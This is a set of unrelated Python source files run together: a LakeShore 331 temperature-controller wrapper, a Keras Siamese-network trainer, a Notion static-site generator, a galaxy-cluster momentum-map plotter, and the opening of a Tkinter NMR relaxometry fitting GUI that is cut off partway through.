self.lakeshore331.get('GetAPIDP') def getBPIDP(self): """ Returns Value P of PID for channel B. Returns ------- Value: Integer, e.g.: 10 Examples -------- >>> ls331.getBPIDP() >>> 32 """ return self.lakeshore331.get('GetBPIDP') def getASetPoint(self): """ Returns setpoint value for channel A. Returns ------- Value: float, e.g.: 0.001 Examples -------- >>> ls331.getASetPoint() >>> 67.87 """ return self.lakeshore331.get('SetASetPoint') def getBSetPoint(self): """ Returns setpoint value for channel B. Returns ------- Value: float, e.g.: 0.001 Examples -------- >>> ls331.getBSetPoint() >>> 67.87 """ return self.lakeshore331.get('GetBSetPoint') def getCTempA(self): """ Returns channel A temperature in Celsius degrees. Returns ------- Value: float, e.g.: 0.001 Examples -------- >>> ls331.getCTempA() >>> 32.56 """ return self.lakeshore331.get('GetCTempA') def getCTempB(self): """ Returns channel B temperature in Celsius degrees. Returns ------- Value: float, e.g.: 0.001 Examples -------- >>> ls331.getCTempB() >>> 32.56 """ return self.lakeshore331.get('GetCTempB') def getKTempA(self): """ Returns channel A temperature in Kelvin. Returns ------- Value: float, e.g.: 0.001 Examples -------- >>> ls331.getKTempA() >>> 32.56 """ return self.lakeshore331.get('GetKTempA') def getKTempB(self): """ Returns channel B temperature in Kelvin. Returns ------- Value: float, e.g.: 0.001 Examples -------- >>> ls331.getKTempB() >>> 32.56 """ return self.lakeshore331.get('GetKTempB') def setHeaterRange(self, heaterRange): """ Heater range command. Parameters ---------- heaterRange : `float` """ self.lakeshore331.put('SetHeaterRange', heaterRange, wait=True) def setASetPoint(self, setPoint): """ Set a setpoint value for channel A. Parameters ---------- setPoint : `float` """ self.lakeshore331.put('SetASetPoint', setPoint, wait=True) def setBSetPoint(self, setPoint): """ Set a setpoint value for channel B. Parameters ---------- setPoint : `float` """ self.lakeshore331.put('SetBSetPoint', setPoint, wait=True) def setAPIDD(self, pid_d): """ D parameter value of PID for channel A. Parameters ---------- pid_d : `integer` """ self.lakeshore331.put('SetAPIDD', pid_d, wait=True) def setBPIDD(self, pid_d): """ D parameter value of PID for channel B. Parameters ---------- pid_d : `integer` """ self.lakeshore331.put('SetBPIDD', pid_d, wait=True) def setAPIDI(self, pid_i): """ I parameter value of PID for channel A. Parameters ---------- pid_i : `integer` """ self.lakeshore331.put('SetAPIDI', pid_i, wait=True) def setBPIDI(self, pid_i): """ I parameter value of PID for channel B. Parameters ---------- pid_i : `integer` """ self.lakeshore331.put('SetBPIDI', pid_i, wait=True) def setAPIDP(self, pid_p): """ P parameter value of PID for channel A. Parameters ---------- pid_p : `integer` """ self.lakeshore331.put('SetAPIDP', pid_p, wait=True) def setBPIDP(self, pid_p): """ P parameter value of PID for channel B. Parameters ---------- pid_p : `integer` """ self.lakeshore331.put('SetBPIDP', pid_p, wait=True) # Get Control Loop Mode def getCMode(self): return self.lakeshore331.get('GetCmode') # Set CMode (Control Loop Mode) def setCMode(self, cmode): self.lakeshore331.put('SetCmode', cmode, wait=True) def setControlAPID(self, a_pid): """ PID for channel A. Parameters ---------- a_pid : `integer` """ self.ls331_control.put('SetAPID', a_pid, wait=True) def setControlBPID(self, b_pid): """ PID for channel B. Parameters ---------- b_pid : `integer` """ self.ls331_control.put('SetBPID', b_pid, wait=True) def setControlTrigger(self, trigger): """ Trigger. Parameters ---------- trigger : `integer` """ self.ls331_control.put('Trigger', trigger, wait=True) def getValue(self): """ Returns ... Returns ------- `float`, Temperature in Celsius degrees """ if (self.ls331_channel == LakeShore_t.Channel_A): return self.getCTempA() else: return self.getCTempB() def setValue(self, temperature): """ Sets ... Parameters ---------- temperature : `float`, Temperature in Celsius degrees """ if (self.ls331_channel == LakeShore_t.Channel_A): self.setASetPoint(temperature) else: self.setBSetPoint(temperature) def wait(self): """ Wait... """ sleep(0) def getLowLimitValue(self): """ Gets ... Returns ------- `float` """ # Mininum is 0 K... -272.15 .oC return -272.15 def getHighLimitValue(self): """ Gets ... Returns ------- `float` """ # Unsure about maximum... let's put 325 K... 51.85 .oC return 51.85
from __future__ import absolute_import from __future__ import print_function import numpy as np import random import os from cv2 import imread from keras.layers import Input,Conv2D,MaxPooling2D,Flatten,Dense,Dropout,Lambda,LSTM,BatchNormalization,LeakyReLU,PReLU from keras import Sequential from keras.datasets import mnist from keras.models import Model from keras.layers import Input, Flatten, Dense, Dropout, Lambda from keras.optimizers import RMSprop,Adam from keras import initializers, regularizers, optimizers from keras import backend as K from keras.regularizers import l2 from keras.initializers import VarianceScaling from keras.callbacks import ModelCheckpoint import matplotlib.pyplot as plt import numpy.random as rng def contrastive_loss(y_true, y_pred): margin = 0.6 square_pred = K.square(y_pred) margin_square = K.square(K.maximum(margin - y_pred, 0)) return K.mean(y_true * square_pred + (1 - y_true) * margin_square) def W_init(shape,name=None): values = rng.normal(loc=0,scale=1e-2,size=shape) return K.variable(values,name=name) def b_init(shape,name=None): values=rng.normal(loc=0.5,scale=1e-2,size=shape) return K.variable(values,name=name) def SiameseNetwork(input_shape): top_input = Input(input_shape) bottom_input = Input(input_shape) # Network model = Sequential() model.add(Conv2D(96,(7,7),activation='relu')) model.add(MaxPooling2D()) model.add(BatchNormalization()) model.add(Conv2D(64,(5,5),activation='relu')) model.add(MaxPooling2D()) model.add(BatchNormalization()) model.add(Conv2D(64,(5,5),activation='relu')) model.add(MaxPooling2D()) model.add(BatchNormalization()) model.add(Flatten()) model.add(Dense(4096,activation='relu')) model.add(BatchNormalization()) model.add(Dense(1024,activation='relu')) model.add(BatchNormalization()) model.add(Dense(512,activation='relu')) model.add(BatchNormalization()) encoded_top = model(top_input) encoded_bottom = model(bottom_input) L1_layer = Lambda(lambda tensors:K.abs(tensors[0] - tensors[1])) L1_distance = L1_layer([encoded_top, encoded_bottom]) prediction = Dense(1,activation='sigmoid',bias_initializer=b_init)(L1_distance) siamesenet = Model(inputs=[top_input,bottom_input],outputs=prediction) return siamesenet def loadimgs(path,n = 0): X=[] y = [] curr_y = n for alphabet in os.listdir(path): print("loading alphabet: " + alphabet) alphabet_path = os.path.join(path,alphabet) category_images=[] for filename in os.listdir(alphabet_path): image_path = os.path.join(alphabet_path, filename) image = imread(image_path).astype('float32')/255 category_images.append(image) y.append(curr_y) try: X.append(np.stack(category_images)) except ValueError as e: print(e) print("error - category_images:", category_images) curr_y += 1 y = np.vstack(y) X = np.stack(X) return X,y def create_pairs(x, digit_indices): '''Positive and negative pair creation. Alternates between positive and negative pairs. ''' num_classes = 23 pairs = [] labels = [] n = min([len(digit_indices[d]) for d in range(num_classes)]) - 1 for d in range(num_classes): for i in range(n): z1, z2 = digit_indices[d][i], digit_indices[d][i + 1] # each folder should have same number of image ex 1447 here f21 = z1//1447 l31 = z1 % 1447 f22 = z2//1447 l32 = z2 % 1447 pairs += [[x[f21][l31], x[f22][l32]]] inc = random.randrange(1, num_classes) dn = (d + inc) % num_classes z1, z2 = digit_indices[d][i], digit_indices[dn][i] f21 = z1//1447 l31 = z1 % 1447 f22 = z2//1447 l32 = z2 % 1447 pairs += [[x[f21][l31], x[f22][l32]]] labels += [1, 0] return np.array(pairs), np.array(labels) X,y = loadimgs('Training_Folder') digit_indices = [np.where(y == i)[0] for i in range(23)] tr_pairs,tr_y = create_pairs(X,digit_indices) print(tr_y.dtype) print(tr_y.shape) print(tr_y) print(tr_pairs[:,0][0]) input_shape = (53,121,3) model = SiameseNetwork(input_shape) filepath = "/home/hemanth12/Paper/Networks/Siamese/Models/simaese-{epoch:02d}-{val_acc:.2f}.h5" checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=False, mode='max') rms = RMSprop() print(model.summary()) model.compile(loss='mse', optimizer=rms, metrics=['accuracy']) history = model.fit([tr_pairs[:, 0], tr_pairs[:, 1]], tr_y.astype('float32'), batch_size=32, epochs=30, validation_split = 0.1,callbacks = [checkpoint]) # Plot training & validation accuracy values plt.plot(history.history['acc']) plt.plot(history.history['val_acc']) plt.title('Model accuracy') plt.ylabel('Accuracy') plt.xlabel('Epoch') plt.legend(['Train', 'Test'], loc='upper left') plt.show() # Plot training & validation loss values plt.plot(history.history['loss']) plt.plot(history.history['val_loss']) plt.title('Model loss') plt.ylabel('Loss') plt.xlabel('Epoch') plt.legend(['Train', 'Test'], loc='upper left') plt.show()
import sass import markdown import shutil import jinja2 from pathlib import Path import logging import dateutil.parser as dt_parser from urllib.parse import urljoin # pip install mdx_truly_sane_lists # required pip install markdown-captions, pip install markdown-checklist # pip install pymdown-extensions def verify_templates(config: dict): """Verifies existense and content of sass and templates dirs.""" if Path(config["sass_dir"]).is_dir() and any(Path(config["sass_dir"]).iterdir()): logging.debug("🤖 Sass directory is OK") else: logging.critical("🤖 Sass directory is not found or empty.") if (Path(config["templates_dir"]).is_dir() and any(Path(config["templates_dir"]).iterdir())): logging.debug("🤖 Templates directory is OK") else: logging.critical("🤖 Templates directory is not found or empty.") def generate_css(config: dict): """Generates css file (compiling sass files in the output_dir folder).""" sass.compile(dirname=(config["sass_dir"], Path(config["output_dir"]) / 'css')) def generate_404(structured_notion: dict, config: dict): """Generates 404 html page.""" with open(Path(config["output_dir"]) / '404.html', 'w+', encoding='utf-8') as f: tml = (Path(config["templates_dir"] ) / '404.html').read_text() jinja_loader = jinja2.FileSystemLoader(config["templates_dir"]) jtml = jinja2.Environment(loader=jinja_loader).from_string(tml) html_page = jtml.render(content='', site=structured_notion) f.write(html_page) def generate_archive(structured_notion: dict, config: dict): """Generates archive page.""" if config["build_locally"]: archive_link = 'Archive.html' structured_notion['archive_url'] = str((Path(config["output_dir"]).resolve() / archive_link)) else: archive_link = 'Archive/index.html' structured_notion['archive_url'] = urljoin(structured_notion['base_url'], archive_link) (Path(config["output_dir"]) / "Archive").mkdir(exist_ok=True) with open(Path(config["output_dir"]) / archive_link, 'w+', encoding='utf-8') as f: # Specify template folder tml = (Path(config["templates_dir"] ) / 'archive.html').read_text() jinja_loader = jinja2.FileSystemLoader(config["templates_dir"]) jtemplate = jinja2.Environment(loader=jinja_loader).from_string(tml) html_page = jtemplate.render(content='', site=structured_notion) f.write(html_page) def str_to_dt(structured_notion: dict): for page_id, page in structured_notion["pages"].items(): for field in ['date', 'date_end', 'last_edited_time']: if field in page.keys(): structured_notion["pages"][page_id][field] = dt_parser.isoparse(page[field]) def generate_page(page_id: str, structured_notion: dict, config: dict): page = structured_notion["pages"][page_id] page_url = page["url"] md_filename = page["title"] + '.md' if config["build_locally"]: folder = urljoin(page_url, '.') local_file_location = str(Path(folder).relative_to(Path(config["output_dir"]).resolve())) html_filename = Path(page_url).name else: local_file_location = page_url.lstrip(config["site_url"]) html_filename = 'index.html' logging.debug(f"🤖 MD {Path(local_file_location) / md_filename}; HTML {Path(local_file_location) / html_filename}") (config["output_dir"] / Path(local_file_location)).mkdir(parents=True, exist_ok=True) with open((config["output_dir"] / Path(local_file_location) / md_filename).resolve(), 'w+', encoding='utf-8') as f: metadata = ("---\n" f"title: {page['title']}\n" f"cover: {page['cover']}\n" f"icon: {page['icon']}\n" f"emoji: {page['emoji']}\n") if "properties_md" in page.keys(): for p_title, p_md in page["properties_md"].items(): metadata += f"{p_title}: {p_md}\n" metadata += f"---\n\n" ### Complex part here md_content = page['md_content'] md_content = metadata + md_content f.write(md_content) html_content = markdown.markdown(md_content, extensions=["meta", "tables", "mdx_truly_sane_lists", "markdown_checklist.extension", "markdown_captions", "pymdownx.tilde", "pymdownx.superfences"], extension_configs={ 'mdx_truly_sane_lists': { 'nested_indent': 4, 'truly_sane': True, }}) tml = (Path(config["templates_dir"] ) / 'page.html').read_text() with open((config["output_dir"] / Path(local_file_location) / html_filename).resolve(), 'w+', encoding='utf-8')as f: # Specify template folder jinja_loader = jinja2.FileSystemLoader(config["templates_dir"]) jtemplate = jinja2.Environment(loader=jinja_loader).from_string(tml) html_page = jtemplate.render(content=html_content, page=page, site=structured_notion) f.write(html_page) def generate_pages(structured_notion: dict, config: dict): for page_id, page in structured_notion["pages"].items(): generate_page(page_id, structured_notion, config) def generate_site(structured_notion: dict, config: dict): verify_templates(config) logging.debug("🤖 SASS and templates are verified.") generate_css(config) logging.debug("🤖 SASS translated to CSS folder.") if (Path(config["output_dir"]) / "css" / "fonts").exists(): shutil.rmtree(Path(config["output_dir"]) / "css" / "fonts") shutil.copytree(Path(config["sass_dir"]) / "fonts", Path(config["output_dir"]) / "css" / "fonts") logging.debug("🤖 Copied fonts.") str_to_dt(structured_notion) logging.debug("🤖 Changed string in dates to datetime objects.") generate_archive(structured_notion, config) logging.info("🤖 Archive page generated.") generate_404(structured_notion, config) logging.info("🤖 404.html page generated.") generate_pages(structured_notion, config) logging.info("🤖 All html and md pages generated.")
<filename>obsolete/map_momentum.py import clusters_retriever as extract from visualisation import map_plot_parameters as plotpar import cluster_profiler as profile from obsolete import map_synthetizer as mapgen import numpy as np from matplotlib import pyplot as plt from mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable from matplotlib.patches import Circle from os import makedirs from os.path import exists def map_weighted_velocity(num_halo, redshift, simulation_type = 'gas', output = 'show', title = True, save_name = 'Map_particles_gas', plot_groups = 'FoF', nbins = 400): # Import data path = extract.path_from_cluster_name(num_halo, simulation_type = simulation_type) file = extract.file_name_hdf5(subject = 'groups', redshift = extract.redshift_floatTostr(redshift)) r200 = extract.group_r200(path, file) group_CoP = extract.group_centre_of_potential(path, file) file = extract.file_name_hdf5(subject = 'particledata', redshift = extract.redshift_floatTostr(redshift)) # Gas particles part_type = extract.particle_type('gas') mass = extract.particle_masses(path, file, part_type) coordinates = extract.particle_coordinates(path, file, part_type) velocities = extract.particle_velocity(path, file, part_type) group_number = extract.group_number(path, file, part_type) subgroup_number = extract.subgroup_number(path, file, part_type) tot_rest_frame, _ = profile.total_mass_rest_frame(path, file) #gas_rest_frame, _ = profile.cluster_average_momentum(path, file, part_type) h = extract.file_hubble_param(path, file) # Retrieve coordinates & velocities x = coordinates[:,0] - group_CoP[0] y = coordinates[:,1] - group_CoP[1] z = coordinates[:,2] - group_CoP[2] vx = velocities[:,0] - tot_rest_frame[0] vy = velocities[:,1] - tot_rest_frame[1] vz = velocities[:,2] - tot_rest_frame[2] # Rescale to comoving coordinates x = profile.comoving_length(x, h, redshift) y = profile.comoving_length(y, h, redshift) z = profile.comoving_length(z, h, redshift) r200 = profile.comoving_length(r200, h, redshift) vx = profile.comoving_velocity(vx, h, redshift) vy = profile.comoving_velocity(vy, h, redshift) vz = profile.comoving_velocity(vz, h, redshift) vx = profile.velocity_units(vx, unit_system = 'astro') vy = profile.velocity_units(vy, unit_system = 'astro') vz = profile.velocity_units(vz, unit_system = 'astro') mass = profile.comoving_mass(mass, h, redshift) mass = profile.mass_units(mass, unit_system = 'astro') # Compute radial distance r = np.sqrt(x**2+y**2+z**2) # Select particles within 5*r200 if plot_groups == 'FoF': index = np.where((r < 5*r200) & (group_number > -1) & (subgroup_number > -1))[0] elif plot_groups == 'subgroups': index = np.where((r < 5*r200) & (group_number > -1) & (subgroup_number > 0))[0] else: print("[ERROR] The (sub)groups you are trying to plot are not defined.") exit(1) mass = mass[index] x, y, z = x[index], y[index], z[index] vx, vy, vz = vx[index], vy[index], vz[index] # Generate plot plotpar.set_defaults_plot() fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(20, 7)) # Bin data #nbins = 800 cmap = mapgen.modified_spectral_cmap(Reversed = True) xlabel = [r'$x\mathrm{/Mpc}$', r'$y\mathrm{/Mpc}$', r'$x\mathrm{/Mpc}$'] ylabel = [r'$y\mathrm{/Mpc}$', r'$z\mathrm{/Mpc}$', r'$z\mathrm{/Mpc}$'] thirdAX = [r'$\bigotimes z$', r'$\bigotimes x$', r'$\bigodot y$'] cbarlabel = [r'$\sum_{i} m_i v_{z, i}\ [\mathrm{M_\odot\ km\ s^{-1}}]$', r'$\sum_{i} m_i v_{x, i}\ [\mathrm{M_\odot\ km\ s^{-1}}]$', r'$\sum_{i} m_i v_{y, i}\ [\mathrm{M_\odot\ km\ s^{-1}}]$'] for i in [0,1,2]: # Handle data if i == 0: x_Data = x y_Data = y weight = vz elif i == 1: x_Data = y y_Data = z weight = vx elif i == 2: x_Data = x y_Data = z weight = vy cmap = mapgen.modified_spectral_cmap(Reversed = False) x_bins = np.linspace(np.min(x_Data), np.max(x_Data), nbins) y_bins = np.linspace(np.min(y_Data), np.max(y_Data), nbins) Cx, Cy = mapgen.bins_meshify(x_Data, y_Data, x_bins, y_bins) # line of sight momentum weights count = mapgen.bins_evaluate(x_Data, y_Data, x_bins, y_bins, weights = mass*weight) norm = mapgen.MidpointNormalize(vmin=count.min(), vmax=count.max(), midpoint=0) img = axes[i].pcolor(Cx, Cy, count, cmap=cmap, norm= norm) # Render elements in plots axes[i].set_aspect('equal') axes[i].add_artist(Circle((0,0), radius=r200, color = 'black', fill = False, linestyle = '--', label = r'$R_{200}$')) axes[i].add_artist(Circle((0,0), radius=5*r200, color = 'black', fill = False, linewidth = 0.5,linestyle = '-', label = r'$R_{200}$')) axes[i].set_xlim(-5.1*r200, 5.1*r200) axes[i].set_ylim(-5.1*r200, 5.1*r200) axes[i].set_xlabel(xlabel[i]) axes[i].set_ylabel(ylabel[i]) axes[i].annotate(thirdAX[i], (0.03, 0.03), textcoords='axes fraction', size = 15) if title: axes[i].set_title(r'$\mathrm{MACSIS\ halo\ } %3d \qquad z = %8.3f$' % (num_halo, redshift)) # Colorbar adjustments ax2_divider = make_axes_locatable(axes[i]) cax2 = ax2_divider.append_axes("right", size="3%", pad="2%") cbar = plt.colorbar(img, cax=cax2, orientation='vertical') cbar.set_label(cbarlabel[i], labelpad=17) #cax2.xaxis.set_tick_labels(['0',' ','0.5',' ','1',' ', '1.5',' ','2']) cax2.xaxis.set_ticks_position("top") # Define output if output == 'show': plt.show() elif output == 'save': dir_name = 'Map mass weighted velocity' if not exists(dir_name): makedirs(dir_name) plt.savefig(dir_name + '//'+save_name+'_partType'+part_type+'_halo'+str(num_halo)+'z'+str(redshift).replace(".", "")+'.pdf') else: print("[ERROR] The output type you are trying to select is not defined.") exit(1) # *********************************** # DERIVED METHODS def map_weighted_velocity_FoF(num_halo, redshift, simulation_type = 'gas', output = 'show' , title = True, save_name = 'Map_momentum', nbins = 400): map_weighted_velocity(num_halo, redshift, output = output, title = title, save_name = save_name, plot_groups = 'FoF', nbins = nbins) def map_weighted_velocity_subgroups(num_halo, redshift, simulation_type = 'gas', output = 'show' , title = True, save_name = 'Map_momentum', nbins = 400): map_weighted_velocity(num_halo, redshift, output = output, title = title, save_name = save_name, plot_groups = 'subgroups', nbins = nbins) # *********************************** # Example of implementation # *********************************** # Specify object simulation_type = 'gas' redshift = 0.57 for num_halo in range(0,1): print('\nExamining halo\t', num_halo) #map_weighted_velocity_subgroups(num_halo, redshift, simulation_type = simulation_type, output = 'save', title = True, save_name = 'Map_mass-w_velocity_subgroups_') #from pdf_graph_merger import merge_pdf #chdir('Map mass weighted velocity') #merge_pdf('Map_mass-w_velocity_', out_filename = 'Map_mass-w_velocity_') print(' - - - - - - - - - \nEnd of file.')
<gh_stars>0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- import tkinter as tk from tkinter.filedialog import askopenfilename, askdirectory from PIL import ImageTk, Image from shutil import copyfile from distutils.dir_util import copy_tree from scipy.optimize import curve_fit from random import uniform from scipy import linalg import numpy as np import time import sys import os CSFolder = str(sys.argv[1]) RatesFolder = CSFolder + "/Rates" sys.path.append(os.path.abspath(CSFolder)) sys.path.append(os.path.abspath(RatesFolder)) import Parameters as ParamFile import _RelaxMat sys.path.append(os.path.abspath('lib')) import FitFunctions as FitF import ShuttlingSimulation as ShSim import Outputs as Out import FigOutputs as FigOut import MonteCarlo as MCMC #################################################### Graphical User Interface #################################################### class GUI(tk.Frame): def __init__(self, parent): tk.Frame.__init__(self, parent) self.parent = parent self.RelaxFunc = ParamFile.ImportFunc() self.RATES = [] self.parameters() ############ Main window def parameters(self): def Quit(self): sys.exit(0) def SaveParam(self): CurrentDir = os.path.dirname(os.path.abspath(__file__)) Out.WritePreSavedParam(self, CurrentDir) #Browsing functions def BrowseFieldCal(self): self.FieldCalibration = askopenfilename() self.FieldCal.config(text=os.path.basename(self.FieldCalibration)) def BrowseExpSetUp(self): self.ExperimentalSetUp = askopenfilename() self.ExpSetUp.config(text=os.path.basename(self.ExperimentalSetUp)) def BrowseRelaxomInt(self): self.Intrelax = askdirectory() self.Irelaxom.config(text=os.path.basename(self.Intrelax)) def BrowseInputs(self): self.InputFile = askopenfilename() self.Input.config(text=os.path.basename(self.InputFile)) def BrowseRates(self, n): n = n[0] if n+1 > len(self.RATES): self.RATES.append(askopenfilename()) else: self.RATES[n] = askopenfilename() self.RelaxationDataSet[n].config(text=os.path.basename(self.RATES[n])) if len(self.RelaxationDataSet) % 2 == 0: self.AddButton.grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=8) else: self.AddButton.grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=4, columnspan=2) def Add(self): N = ([self.Nlabel]) self.Nlabel += 1 self.AddButton.grid_forget() self.RelaxationDataSet.append(tk.Button(self.param, text="High field rates", command = lambda: BrowseRates(self, N))) self.RelaxationDataType.append(tk.StringVar()) self.RelaxationDataType[-1].set("Data Type") self.RelaxationType.append(tk.OptionMenu(self.param, self.RelaxationDataType[-1], *self.MenuRelaxType.keys())) Field = tk.StringVar() Field.set("High field (T)") self.Fields.append(tk.Entry(self.param, textvariable = Field, width=10)) if len(self.RelaxationDataSet) % 2 == 0: self.RelaxationDataSet[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=4, columnspan=2) self.RelaxationType[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=6) self.Fields[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=7) else: self.RelaxationDataSet[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=0, columnspan=2) self.RelaxationType[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=2) self.Fields[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=3) #function to load previous parameters def LoadParam(self): root.withdraw() self.parameters = askopenfilename() paramFile = open(self.parameters, 'r') nparam = sum(1 for line in paramFile)-1 paramFile.close() paramFile = open(self.parameters, 'r') paramFile.readline() previousSetUp = [] for i in range(nparam): Line = paramFile.readline() Line = [x for x in Line.split('\n')] Line = Line[0] Line = [x for x in Line.split('\t')] previousSetUp.append(Line) self.TAUC.set(previousSetUp[0][1]) self.AccelerationTYPE.set(previousSetUp[1][1]) self.NWALKER.set(previousSetUp[2][1]) self.NMCMC.set(previousSetUp[3][1]) if previousSetUp[4][1] != 'Not available': self.PDBID.set(previousSetUp[4][1]) if os.path.exists(previousSetUp[5][1]): self.ExperimentalSetUp = previousSetUp[5][1] self.ExpSetUp.config(text=os.path.basename(self.ExperimentalSetUp)) else: self.ErrorText = tk.Label(self.param, text = "Status: Missing file(s)", fg="orange") self.ErrorText.grid(row=0, column=3) if os.path.exists(previousSetUp[6][1]): self.FieldCalibration = previousSetUp[6][1] self.FieldCal.config(text=os.path.basename(self.FieldCalibration)) else: self.ErrorText = tk.Label(self.param, text = "Status: Missing file(s)", fg="orange") self.ErrorText.grid(row=0, column=3) if os.path.exists(previousSetUp[7][1]): self.Intrelax = previousSetUp[7][1] self.Irelaxom.config(text=os.path.basename(self.Intrelax)) else: self.ErrorText = tk.Label(self.param, text = "Status: Missing file(s)", fg="orange") self.ErrorText.grid(row=0, column=3) if os.path.exists(previousSetUp[8][1]): self.InputFile = previousSetUp[8][1] self.Input.config(text=os.path.basename(self.InputFile)) else: self.ErrorText = tk.Label(self.param, text = "Status: Missing file(s)", fg="orange") self.ErrorText.grid(row=0, column=3) if len(previousSetUp[9]) == 3*len(self.mins2)+1: for i in range(len(self.mins2)): self.mins2[i].set(previousSetUp[9][3*i+1]) self.maxs2[i].set(previousSetUp[9][3*i+2]) if len(previousSetUp[10]) == 3*len(self.mintau)+1: for i in range(len(self.mintau)): self.mintau[i].set(previousSetUp[10][3*i+1]) self.maxtau[i].set(previousSetUp[10][3*i+2]) if len(previousSetUp[11]) == 3*len(self.minOthers)+1: for i in range(len(self.minOthers)): self.minOthers[i].set(previousSetUp[11][3*i+1]) self.maxOthers[i].set(previousSetUp[11][3*i+2]) self.AddButton.grid_forget() for i in range(len(self.RelaxationDataSet)): self.RelaxationDataSet[i].grid_forget() self.RelaxationType[i].grid_forget() self.Fields[i].grid_forget() self.RATES = [] self.RelaxationDataSet = [] self.RelaxationDataType = [] self.RelaxationType = [] self.Fields = [] self.Nlabel = 0 for i in range(12, nparam): if os.path.exists(previousSetUp[i][1]): Add(self) self.RelaxationDataSet[-1].config(text=os.path.basename(previousSetUp[i][1])) self.RATES.append(previousSetUp[i][1]) self.RelaxationDataType[-1].set(previousSetUp[i][2]) self.Fields[-1].delete(0, "end") self.Fields[-1].insert(0, previousSetUp[i][3]) if len(self.RelaxationDataSet) % 2 == 0: self.RelaxationDataSet[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=4, columnspan=2) self.RelaxationType[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=6) self.Fields[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=7) else: self.RelaxationDataSet[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=0, columnspan=2) self.RelaxationType[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=2) self.Fields[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=3) else: self.ErrorText = tk.Label(self.param, text = "Status: Missing file(s)", fg="orange") self.ErrorText.grid(row=0, column=3) if len(self.RelaxationDataSet) % 2 == 0: self.AddButton.grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=8, columnspan=2) else: self.AddButton.grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=4, columnspan=2) ############# GUI coding self.param = tk.Toplevel() self.param.title("MINOTAUR") self.param.geometry("1300x800") self.grid(row=0, column=0) self.img = ImageTk.PhotoImage(Image.open("lib/Logo.jpg")) panel = tk.Label(self.param, image=self.img) panel.grid(row=0, column=2, columnspan=3, rowspan=2) #Button part self.quitButton = tk.Button(self.param, text="Quit", command = lambda: Quit(self)) self.startButton = tk.Button(self.param, text="Start", bg="green", command=self.GetData) self.quitButton.grid(row=0, column=6) self.startButton.grid(row=0, column=7) self.Load = tk.Button(self.param, text="Load previous parameters", command = lambda: LoadParam(self)) self.Load.grid(row=0, column=0, columnspan=3) self.Save = tk.Button(self.param, text="Save current parameters", command = lambda: SaveParam(self)) self.Save.grid(row=1, column=6, columnspan=2) #Fitting parameters part ParamText = tk.Label(self.param, text="Set fitting parameters:", fg="blue") self.TAUC = tk.IntVar() self.TAUC.set("Correlation time TauC (sec)") self.TauC = tk.Entry(self.param, textvariable = self.TAUC) self.AccelerationTYPE = tk.StringVar() self.AccelerationTYPE.set("Type of shuttling") AccelerationType = tk.OptionMenu(self.param, self.AccelerationTYPE, "Constant Speed", "Constant Acceleration") self.NMCMC= tk.IntVar() self.NMCMC.set("MCMC - Number of steps") self.Nmcmc = tk.Entry(self.param, textvariable = self.NMCMC, width=25) self.NWALKER = tk.IntVar() self.NWALKER.set("MCMC - Number of chains") self.Nwalker = tk.Entry(self.param, textvariable = self.NWALKER, width=25) ParamText.grid(row=1, column=0) self.TauC.grid(row=2, column=0, columnspan=3) AccelerationType.grid(row=2, column=3, columnspan=2) self.Nwalker.grid(row=3, column=5, columnspan=3) self.Nmcmc.grid(row=2, column=5, columnspan=3) #Limits Part LimitText = tk.Label(self.param, text="Set Limits for MCMC initial guess:", fg="blue") MinS2Text = tk.Label(self.param, text="Min") MaxS2Text = tk.Label(self.param, text="Max") MinTauText = tk.Label(self.param, text="Min") MaxTauText = tk.Label(self.param, text="Max") MinOtherText = tk.Label(self.param, text="Min") MaxOtherText = tk.Label(self.param, text="Max") LimitText.grid(row=5, column=0) MinS2Text.grid(row=6, column=1) MaxS2Text.grid(row=6, column=2) MinTauText.grid(row=6, column=4) MaxTauText.grid(row=6, column=5) MinOtherText.grid(row=6, column=7) MaxOtherText.grid(row=6, column=8) self.OP = ParamFile.Names['OrderParam'] self.MinS2 = [] self.MaxS2 = [] self.mins2 = [] self.maxs2 = [] for i in range(len(self.OP)): s2Text = tk.Label(self.param, text=self.OP[i]) self.mins2.append(tk.IntVar()) self.mins2[-1].set("0.0") self.MinS2.append(tk.Entry(self.param, textvariable = self.mins2[-1], width=10)) self.maxs2.append(tk.IntVar()) self.maxs2[-1].set("1.0") self.MaxS2.append(tk.Entry(self.param, textvariable = self.maxs2[-1], width=10)) s2Text.grid(row=7+i, column=0) self.MinS2[i].grid(row=7+i, column=1) self.MaxS2[i].grid(row=7+i, column=2) self.CT = ParamFile.Names['CorrTimes'] self.MinTau = [] self.MaxTau = [] self.mintau = [] self.maxtau = [] for i in range(len(self.CT)): tauText = tk.Label(self.param, text=self.CT[i]) self.mintau.append(tk.IntVar()) self.mintau[-1].set("") self.MinTau.append(tk.Entry(self.param, textvariable = self.mintau[-1], width=10)) self.maxtau.append(tk.IntVar()) self.maxtau[-1].set("") self.MaxTau.append(tk.Entry(self.param, textvariable = self.maxtau[-1], width=10)) tauText.grid(row=7+i, column=3) self.MinTau[i].grid(row=7+i, column=4) self.MaxTau[i].grid(row=7+i, column=5) self.Others = ParamFile.Names['others'] self.MinOthers = [] self.MaxOthers = [] self.minOthers = [] self.maxOthers = [] for i in range(len(self.Others)): OthersText = tk.Label(self.param, text=self.Others[i]) self.minOthers.append(tk.IntVar()) self.minOthers[-1].set("") self.MinOthers.append(tk.Entry(self.param, textvariable = self.minOthers[-1], width=10)) 